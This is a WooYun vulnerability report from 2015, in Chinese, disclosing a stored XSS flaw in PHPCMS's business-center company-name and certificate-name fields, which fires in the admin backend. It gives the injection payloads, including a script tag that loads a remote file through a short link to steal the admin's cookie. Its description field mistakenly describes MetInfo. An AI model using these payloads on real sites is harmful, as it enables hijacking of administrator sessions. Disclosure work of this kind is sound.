漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-089704
漏洞标题:PHPCMS储存型XSS盲打后台(demo)
相关厂商:phpcms
漏洞作者: 路人甲
提交时间:2015-03-11 14:32
修复时间:2015-06-14 14:34
公开时间:2015-06-14 14:34
漏洞类型:xss跨站脚本攻击
危害等级:高
自评Rank:20
漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-03-11: 细节已通知厂商并且等待厂商处理中
2015-03-16: 厂商主动忽略漏洞,细节向第三方安全合作伙伴开放
2015-05-10: 细节向核心白帽子及相关领域专家公开
2015-05-20: 细节向普通白帽子公开
2015-05-30: 细节向实习白帽子公开
2015-06-14: 细节向公众公开
简要描述:
MetInfo企业网站管理系统采用PHP+Mysql架构,全站内置了SEO搜索引擎优化机制,支持用户自定义界面语言(全球各种语言),拥有企业网站常用的模块功能(企业简介模块、新闻模块、产品模块、下载模块、图片模块、招聘模块、在线留言、反馈系统、在线交流、友情链接、网站地图、会员与权限管理)。
详细说明:
XSS的地方在会员中心--商务中心--商家资料--企业名称那里,直接插入<body/onload=alert(1)>就能触发
由于他这个演示没有后台管理,所以不知道能不能打后台,无奈只好本地搭建测试了(我嘞个擦擦,时间都浪费在这儿了,先下载的官方最新安装包,然后发现没有商务中心这个模块,百度之后知道那个属于企业版,要下载个企业黄页,然后好不容易在官方找到了企业黄页的扩展包,又有好多问题。。不多了,说多了都是泪啊。。),本地搭建测试成功后,登陆后台可以看到成功弹窗
然后我就兴致冲冲的来提交漏洞,我怕有重复的洞啊(心里想的应该不会有吧),然后就去百度和乌云,360和其他平台找了找,我凑没想到果然有重复的洞。。
当时我那个心情啊。。不说了。。没办法既然有重复的洞就再继续挖吧,果然黄天不负有心人,我又成功挖到了一个可以打后台的储存型XSS,这个在商务中心--资质证书--证书名称那里,直接插"/><body/onload=alert(1)>
然后可以看到成功弹窗
接下来来到后台看看,成功~
大牛们说了成功弹窗的黑阔不是好黑阔,打到cookie的黑阔才是好黑阔,试试能不能打cookie吧,继续构造"><script src=http://t.cn/Rzztv4u></script>
然后后台查看后去平台看看,成功打到cookie~
漏洞证明:
修复方案:
过滤
版权声明:转载请注明来源 路人甲@乌云
漏洞回应
厂商回应:
危害等级:无影响厂商忽略
忽略时间:2015-06-14 14:34
厂商回复:
最新状态:
暂无